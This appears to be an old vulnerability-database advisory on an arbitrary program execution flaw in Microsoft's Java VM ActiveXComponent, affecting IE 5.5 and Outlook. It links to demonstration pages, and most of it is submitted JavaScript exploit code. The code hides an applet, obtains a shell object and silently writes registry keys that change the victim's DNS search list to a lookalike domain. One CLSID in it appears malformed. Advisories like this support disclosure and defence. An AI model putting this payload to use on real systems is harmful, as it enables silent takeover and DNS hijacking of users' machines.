|
|
Microsoft Virtual Machine com.ms.activeX.ActiveXComponent Arbitrary Program Execution Vulnerability
Georgi Guninski <guninski@guninski.com> has set up the following demonstration pages: Demo #1 - IE 5.5/Outlook security vulnerability - com.ms.activeX.ActiveXComponent allows executing arbitrary programs. This page creates the file "EA.HTA" in your Startup folder - you shall see the result the next time you logon: http://www.guninski.com/javaea1.html Demo #2 - IE 5.5/Outlook security vulnerability - com.ms.activeX.ActiveXComponent allows executing arbitrary programs. This page creates the file "EA" on Desktop: http://www.guninski.com/javaea2.html Exploit code submitted by Marcin Jackowski <marcin@jackowski.net>: <script> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function yuzi3(){ try{ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance();Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); try{ Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net"); } catch(e){} } catch(e){} } setTimeout("yuzi3()",1000); document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function yuzi2(){ try{ a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a2.createInstance();Shl = a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}"); try{ Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1"); } catch(e){} } catch(e){} }setTimeout("yuzi2()",1000); </script> |
|
Privacy Statement |